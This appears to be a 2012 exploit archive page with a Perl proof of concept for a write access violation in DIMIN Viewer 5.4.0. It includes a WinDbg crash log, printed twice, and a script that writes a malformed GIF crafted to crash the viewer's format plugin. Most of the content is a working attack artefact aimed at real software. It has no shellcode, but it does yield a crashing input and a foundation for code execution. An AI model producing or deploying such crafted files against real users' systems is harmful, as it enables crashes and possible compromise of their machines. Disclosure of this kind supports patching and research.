what you don't know can hurt you

DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution
Posted Dec 9, 2012
Authored by Jean Pascal Pereira

DIMIN Viewer version 5.4.0 suffers from a WriteAV arbitrary code execution vulnerability.

tags | exploit, arbitrary, code execution
MD5 | 0ec28d05819ce388260faa3e453218b0

DIMIN Viewer 5.4.0 WriteAV Arbitrary Code Execution

Change Mirror Download
#!/usr/bin/perl

# DIMIN Viewer 5.4.0 <= WriteAV Arbitrary Code Execution

# Author: Jean Pascal Pereira <pereira@secbiz.de>

# Vendor URI: http://www.dimin.net

# Vendor Decription:

# View images in countless formats, and apply a variety of effects with this small, fast, and powerful
# application. Dimin Viewer incorporates unique visualization ideas, like Panoramic Photographs Tool
# and Big Image Navigator. It also features multi language interface to feel yourself at home!

# Debug info:
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 006bb000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll
# ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv
# (fdc.b98): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll
# ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll
# ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll
# (fdc.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# 0:000> r;!exploitable -v;q
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# Exception Faulting Address: 0x1471000
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
#
# Exception Hash (Major/Minor): 0x550b2f71.0x55423571
#
# Stack Trace:
# div5_xtd_formats!divGetFilter+0x80c8b
# div5_xtd_formats!divGetFilter+0x80d0a
# div5_xtd_formats+0xc821
# div5_xtd_formats+0xcc07
# Instruction Address: 0x0000000000fb1a7b
#
#
# Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# CommandLine: "C:\Program Files\DIMIN\Viewer5\imgview5.exe" C:\research\Viewer5\crafted.gif
# Symbol search path is: *** Invalid ***
# ****************************************************************************
# * Symbol loading may be unreliable without a symbol search path. *
# * Use .symfix to have the debugger choose a symbol path. *
# * After setting your symbol path, use .reload to refresh symbol locations. *
# ****************************************************************************
# Executable search path is:
# ModLoad: 00400000 006bb000 image00400000
# ModLoad: 7c900000 7c9b2000 ntdll.dll
# ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
# ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\advapi32.dll
# ModLoad: 77e70000 77f03000 C:\WINDOWS\system32\RPCRT4.dll
# ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
# ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll
# ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
# ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
# ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
# ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
# ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
# ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
# ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll
# ModLoad: 77120000 771ab000 C:\WINDOWS\system32\oleaut32.dll
# ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\version.dll
# ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\winmm.dll
# ModLoad: 73000000 73026000 C:\WINDOWS\system32\winspool.drv
# (fdc.b98): Break instruction exception - code 80000003 (first chance)
# ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
# ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
# ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
# ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
# ModLoad: 00e50000 00ef7000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_dcraw.dll
# ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
# ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
# ModLoad: 00f20000 0102f000 C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# ModLoad: 01050000 0106a000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_morphology.dll
# ModLoad: 01090000 010ba000 C:\Program Files\DIMIN\Viewer5\plugin_filters\div5_xtdFilters.dll
# (fdc.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** WARNING: Unable to verify checksum for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\DIMIN\Viewer5\plugin_formats\div5_xtd_formats.dll -
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# 0:000> r;!exploitable -v;q
# eax=014707c0 ebx=01480020 ecx=000167ee edx=00000000 esi=01480820 edi=01470fc0
# eip=00fb1a7b esp=0011ee2c ebp=0011ee34 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# div5_xtd_formats!divGetFilter+0x80c8b:
# 00fb1a7b 660f7f6740 movdqa xmmword ptr [edi+40h],xmm4 ds:0023:01471000=????????????????????????????????
# HostMachine\HostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll -
# Exception Faulting Address: 0x1471000
# First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Write Access Violation
#
# Exception Hash (Major/Minor): 0x550b2f71.0x55423571
#
# Stack Trace:
# div5_xtd_formats!divGetFilter+0x80c8b
# div5_xtd_formats!divGetFilter+0x80d0a
# div5_xtd_formats+0xc821
# div5_xtd_formats+0xcc07
# Instruction Address: 0x0000000000fb1a7b

# Proof of Concept:

my $crafted = "\x47\x49\x46\x38\x39\x61\x30\x00\x2C\x00\xB3\x00\x00\x00\x00\x00".
"\x80\x00\x00\x00\x80\x00\x80\x80\x00\x00\x00\x80\x80\x00\x80\x00".
"\x80\x80\x80\x80\x80\xC0\xC0\xC0\xFF\x00\x00\x00\xFF\x00\xFF\xFF".
"\x00\x00\x00\xFF\xFF\x00\xFF\x00\xFF\xFF\xFF\xFF\xFF\x21\xF9\x04".
"\x01\x00\x00\x0F\x00\x2C\x00\x00\x00\x00\x30\x00\x2C\x00\x00\xFE".
"\x04\xF0";

open(C, ">:raw", "crafted.gif");
print C $crafted;
close(C);

# http://0xffe4.org

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close